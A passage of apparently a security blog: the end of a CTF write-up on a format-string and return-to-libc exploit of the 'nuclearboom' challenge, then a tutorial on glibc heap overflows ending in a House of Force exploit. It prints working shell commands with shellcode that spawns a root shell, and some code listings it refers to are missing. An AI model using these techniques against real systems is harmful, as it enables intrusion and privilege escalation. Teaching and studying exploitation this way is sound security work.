The next to last instruction is leave, which is equivalent with mov %ebp, %esp followed by pop %ebp. Aha! Here the register esp is set to ebp, and we control ebp since we overwrote it in the call the printf! With control over esp we can do a traditional return-to-libc attack, and in our case we will construct a fake stack frame so the program will execute execve("/bin/sh", NULL, NULL).

The hackers are ready to attack Cyberdyne.

Writing the Exploit

Time to get to business. First the location of the stack and the code (link to code) is extracted using
%10$p:ENDEBP:%11$p:ENDRET: 
Then we extract the location of execve() (link to code). This is done by reading the .GOT entry of fork() and adding the appropriate offset so we end up with the address of execve(). The given input is of the form:
<addr .GOT entry fork>%22$s:ENFORK:
We continue by storing the stack frame for the return-to-libc attack. To construct it we use the addresses extracted in the previous two steps. The code to construct the stack frame and store it is:


Important to note is that the memory region where the power plant info is saved is first initialized to zero. Hence the first few bytes after the plant name also contains zeros, and thus the argv and envp arguments are pointers to NULL.

Finally we trigger the return-to-libc exploit by overwriting the saved frame pointer (ebp) in the print function:


When combining all the parts we get the following beautiful result (link to code):

There is no right and wrong. There's only fun and boring.


Exploit Reliability

A final note is due about the reliability of the current exploit. It assumes there are no whitespace characters (space, tab, newline, vertical-tab, form-feed characters, or terminating zero) within any of the (extracted) addresses. If there are the exploit will fail as not all data of the payload and/or exploit will be read during the scanf call. However this is only a limitation of the current exploit: we can write any byte using the format specifier %hn and read any byte using %s. This allows us to create an exploit which will work under any environment.

Background

The UCSB International Capture The Flag (iCTF) is a computer security challenge where participants have to attack other systems and defend their own. This year we participated with our KU Leuven hacknamstyle research team.

To get a feel of the atmosphere of a security CTF, the video below shows the rwthCTF from the perspective of the organizers (and of course we also participated in that CTF).


For the iCTF our team successfully exploited 4 challenges: nuclearboom, water, pesticides and traintrain. This got us quite some attack points, though we didn't focus on defence, making us end on a respectable 37 place out of 98 participating teams.

In this post I focused on one challenge: nuclearboom. I've already encountered a few write-ups on nuclearboom [codezen, lifayk], but those only explain how to steal the flag, whereas my exploit actually make it spawn a (remote) shell. To do this we have bypassed both ASLR and NXboth widely used protection mechanisms in modern operating systems and programs. It turned out that this challenge was perfect to show how information leakage defeats ASLR, and how a return-oriented-programming techniques can defeat NX.

Footnotes

[1] After accepting an incoming connection stdout, stdin and stderr are replaced with the socket file descriptor using dup2. This way the program can simply use sscanf and printf, knowing that everything actually happens over the TCP connection. So in this case the output of the printf call will be redirected over the TCP connection.

Friday 8 February 2013

Understanding the Heap & Exploiting Heap Overflows

This post will begin with a high level description of the heap and slowly builds up untill you able to write your own heap-based exploits. We assume we have non-root access to a computer but are able to run the following program as root (meaning it's a suid binary):


There's a blatant buffer overflow in line 10 which we will be exploiting. First we need to know how the heap is managed (we focus on Linux).

Basic Heap and Chunk Layout

Every memory allocation a program makes (say by calling malloc) is internally represented by a so called "chunk". A chunk consists of metadata and the memory returned to the program (i.e., the memory actually returned by malloc). All these chunks are saved on the heap, which is a memory region capable of expanding when new memory is requested. Similarly, the heap can shrink once a certain amount of memory has been freed. A chunk is defined in the glibc source as follows:


Assuming no memory chunks have been freed yet, new memory allocations are always stored right after the last allocated chunk. So if a program were to call malloc(256), malloc(512), and finally malloc(1024), the memory layout of the heap is as follows:
Meta-data of chunk created by malloc(256)
The 256 bytes of memory return by malloc
-----------------------------------------
Meta-data of chunk created by malloc(512)
The 512 bytes of memory return by malloc
-----------------------------------------
Meta-data of chunk created by malloc(1024)
The 1024 bytes of memory return by malloc
-----------------------------------------
Meta-data of the top chunk
The dash line "---" is an imaginary boundary between the chunks, in reality they are placed right next to each other (example program illustrating the layout). Anyway, you're probably wondering why I included the meta data of the "top chunk" in the layout. Well, the top chunk represents the remaining available memory on the heap, and it is the only chunk that can grow in size. When a new memory request is made, the top chunk is split into two: the first part becomes the requested chunk, and the second part is the new the top chunk (so the "top chunk" shrunk in size). If the top chunk is not large enough to fulfill the memory allocation, the program asks the operating system to expand the top chunk (making the heap grow in size).

Interpretation of the Chunk Structure

The interpretation of the chunk structure depends on the current state of the chunk. For example, the only metadata present in an allocated chunk are the prev_size and size fields. The buffer returned to the program starts at the fd field. This means an allocated chunk always has 8 bytes of metadata, after which the actual buffer starts. Also surprising is that the prev_size field isn't used by allocated chunks! In a minute we will see that an unallocated (free) chunk does use the additional fields.

Another important observation is that in glibc chunks are always 8-bytes aligned. And to simplify memory management the size of chunks is always a multiple of 8 bytes. This means that the last 3 bits of the size field can be used for other purposes (these 3 bits would always be zero otherwise). Only the first (least significant) bit is important for us. If it's set it means that the previous chunk is in use. If it's not set the previous chunk is not in use. A chunk is not in used if the corresponding memory has been freed (by a call to free).

So how can we check whether the current chunk is in use? Simple really: we navigate to the next chunk by adding size to the pointer of the current chunk, resulting in the location of the next chunk. In this next chunk we read the least significant bit of the size field to see if the chunk is in use.

Managing Free Chunks

We know that when a chunk is freed, the least significant bit of the size field in the meta data of the next chunk must be cleared. Additionally, the prev_size field of this next chunk will be set to the size of the chunk we are freeing.

A freed chunk also uses the fd and bk fields. These are the fields we can abuse in our exploit. The fd field points to the previous free chunk, and the bk field to the next free chunk. This means free chunks are saved in a doubly linked list. However there isn't just one list containing all free chunks. There are actually multiple lists of free chunks. Each list contains free chunks of a specific size. This makes searching for a free chunk of a certain size a lot faster, since it only has to search in the list supporting the particular size. We now need to correct an earlier statement: When a memory allocation request is made, it first searches for a free chunk that has the same size (or a bit larger), and will reuse that memory. Only if no appropriate free chunk was found will the top chunk be used.

Finally we get to the functionality we will exploit: freeing a chunk. When a chunk is freed (e.g. by a call to free) it checks whether the chunk before it has already been freed. In case the previous chunk is not in use, it's coalesced with the chunk being freed. However this increases the size of the chunk. As a result the chunk has to be placed in a different list of free chunks. To do this the already freed chunk is first removed from the linked list, and then the coalesced chunk is added to the appropriate list. The code of removing a chunk from a linked list is:


Here argument P represents the chunk being removed from the list. Arguments BK and FD are output arguments representing the previous and next chunk, respectively. This is very typical code to remove an element from a linked list, and its operation is illustrated below [Source]:

Here the element containing "Lam Larry" is being removed from the list. As you can see, to remove an element from a linked list two operators must be performed:
  1. The backward (bk) pointer of the next element (FD->bk) is set to the pointer of the previous element (BK). This corresponds to line 6 of the unlink function.
  2. The forward (fd) pointer of the previous element (BK->fd) is set to the pointer of the next element (FD). This corresponds to line 7 of the unlink function.
From an attacker perspective, the important thing is that two write operations to the memory are performed. The goal is now to manipulate the metadata so that we can control the value being written, and control where it's written. This allows us to write an arbitrary value to an arbitrary location. With this we can overwrite the function pointer of a destructor, and make it point to our own code.

Note: The article Vudo malloc tricks [7] also contains a more detailed discussion about how malloc works internally.

More Recent Techniques

Unfortunately the technique explained above is no longer possible against newer versions of glibc. The unlink function has been hardened and includes the following runtime check: the forward pointer of the previous chunk must point toward the current chunk. Similarly the previous pointer of the next chunk must also point toward the current chunk:


For the more advanced techniques we will base ourselves on the techniques outlined in the Malloc Maleficarum [5] and the Malloc Des-Maleficarum [6]. The author introduced several techniques and gave them rather special names. The requirements of these techniques are:
  • The House of Prime: Requires two free's of chunks containing attacker controlled size fields, followed by a call to malloc.
  • The House of Mind: Requires the manipulation of the program into repeatedly allocating new memory.
  • The House of Force: Requires that we can overwrite the top chunk, that there is one malloc call with a user controllable size, and finally requires another call to malloc.
  • The House of Lore: Again not applicable to our example program.
  • The House of Spirit: One assumption is that the attacker controls a pointer given to free, so again this technique cannot be used.
  • The House of Chaos: This isn't actually a technique, just a section in the article :)
To conclude: the techniques in the Malloc Maleficarum are not applicable to our very simple example. All techniques require a sufficient (and controllable) amount of calls to free and/or malloc. Now, in sufficiently large programs there should be enough methods to trigger calls to free/malloc, possible making them exploitable. So the real problem is that our example is not realistic: it's just too simple! Therefore we will update the example so it matches a possible scenario we can actually exploit. The updated example is:


It might seem like a big requirement that we can control the size given to the malloc call. This is not necessarily true. Imagine a (networked) service capable of caching objects. To cache an object first the size of the object is sent to the service, after which the object itself is transmitted. In such a program one can easily control the size given to a malloc call. Anyway, this example is something we can exploit, even when compiled against the latest glibc!

Exploitation Technique: The House of Force

Our example program nicely matches the requirements of the House of Force technique. This technique abuses the code responsible for allocating memory from the top chunk. This code is in _int_malloc:


The goal is to overwrite av->top with a user controllable value. The av->top variable always points to the top chunk. During a call to malloc this variable is used to get a reference to the top chunk (in case no other chunks could fulfill the request). This means that if we control the value of av->top, and we can force a call to malloc which uses the top chunk, we control where the next chunk will be allocated (i.e. we control the return value of malloc in line 15 of the example). Consequently we can write arbitrary bytes to any address using line 16.

To make sure the appropriate code gets executed the if-test in line 15 must evaluate to true. This test checks whether the top chunk is large enough to contain the requested chunk (and if enough space remains for the metadata in the top chunk). We want to assure that any request (of arbitrary large size) will use the top chunk. To accomplish this we abuse the overflow in line 11 to overwrite the metadata of the top chunk. First we write 256 bytes to fill up the allocated space, then 4 bytes to overwrite prev_size, and we finally overwrite the size with the largest possible (unsigned) integer:
LARGETOPCHUNK=$(perl -e 'print "A"x260 . "\xFF\xFF\xFF\xFF"')
./example $LARGETOPCHUNK 1 2
The above won't actually exploit the program, since more steps are needed. But feel free to use a debugger and confirm that the size of the top chunk is indeed modified. We continue by overwriting the variable av->top. Our goal is to make it point 8 bytes before the GOT entry of free. The GOT table is where pointers to dynamically loaded functions are stored. So if we're able to overwrite the pointer to free, we can make the program jump to an arbitrary location (and in particular to our shellcode). To find out the address of the got.plt entry execute:
readelf --relocs example
In my case free was located at 0804a008, which subtracted by 8 becomes 0x804a000. The value being written to av->top is calculated by chunk_at_offset:
/* Treat space at ptr + offset as a chunk */
#define chunk_at_offset(p, s)  ((mchunkptr)(((char*)(p)) + (s)))
We control the second argument: nb (in the #define called s). By debugging the program I found that victim (the older value for av->top) was 0x804b110. Hence the value passed to malloc should be 0x804a000 - 0x804b110 =  FFFFEEF0. We now get:
LARGETOPCHUNK=$(perl -e 'print "A"x260 . "\xFF\xFF\xFF\xFF"')
./example $LARGETOPCHUNK FFFFEEF0 AAAA
Resulting in a segfault with eip set to 0x41414141 (= the byte encoding of AAAA)! The final step is to point eip to a location under our control. Let's assume ASLR is disabled, so the stack is always at a fixed location. In my case it starts at 0xBFFFFFFF. All that remains is to construct a NOP slide, inject the shellcode, and make eip point towards the NOP slide:
LARGETOPCHUNK=$(perl -e 'print "A"x260 . "\xFF\xFF\xFF\xFF"')
NOPS=$(perl -e 'print "\x90"x 0x10000')
SC=$'\x68\x2f\x73\x68\x5a\x68\x2f\x62\x69\x6e\x89\xe7\x31\xc0\x88\x47\x07\x8d\x57\x0c\x89\x02\x8d\x4f\x08\x89\x39\x89\xfb\xb0\x0b\xcd\x80'
STACKADDR=$'\x01\xC0\xFF\xBF'
env -i "A=$NOPS$SC" ./example $LARGETOPCHUNK FFFFEEF0 $STACKADDR
Hell yeah! We are now greeted by a nice sh shell! =)

Ahhh, the joy of success!

A few final remarks are in place. First, we used a large NOP slide. This makes it a lot easier to get the stack address (the third argument) correct. Second, the first byte of $STACKADDR starts with 1. This is done to avoid if from containing a NULL byte (which would terminate the string). Finally we placed the NOP slide and shell code into environment variables, and used the env command to clear all other environment variables (resulting in more predictable behaviour of the exploit).

Additionally we could've beaten ASLR by a simple brute force, as we are working on a 32 bit platform. In case DEP is enabled our shellcode on the stack would not be executable, and we would have to fall back on Return Oriented Programming (ROP). This requires controlling the value of esp, which can be done by overwriting the value of a saved frame-pointer (saved ebp value).

Conclusion

We have successfully exploited the second example program. Additionally it was explained how both DEP and ASLR can be bypassed.

References

[1] Justin N. Ferguson, Understanding the heap by breaking it. Blackhat USA, 2007.
[2] J. Koziol, D. Litchfield, D. Aitel, C. Anley, S. Eren, N. Mehta, and R. Hassell. The Shellcoder’s Handbook: Discovering and Exploiting Security Holes. Wiley, 2003.
[3] Doug Lea, Design of dlmalloc: A Memory Allocator. Personal website.
[4] Andries Brouwer, Hackers Hut: Exploiting the heap.
[5] Phantasmal Phantasmagoria, The Malloc Maleficarum. bugtraq mailing list, 2005.
[6] blackngel, Malloc Des-Maleficarum. Phrack Volume 0x0d, Issue 0x42, 2009.
[7] MaXX, Vudo malloc tricksPhrack Volume 0x0b, Issue 0x39, 2001.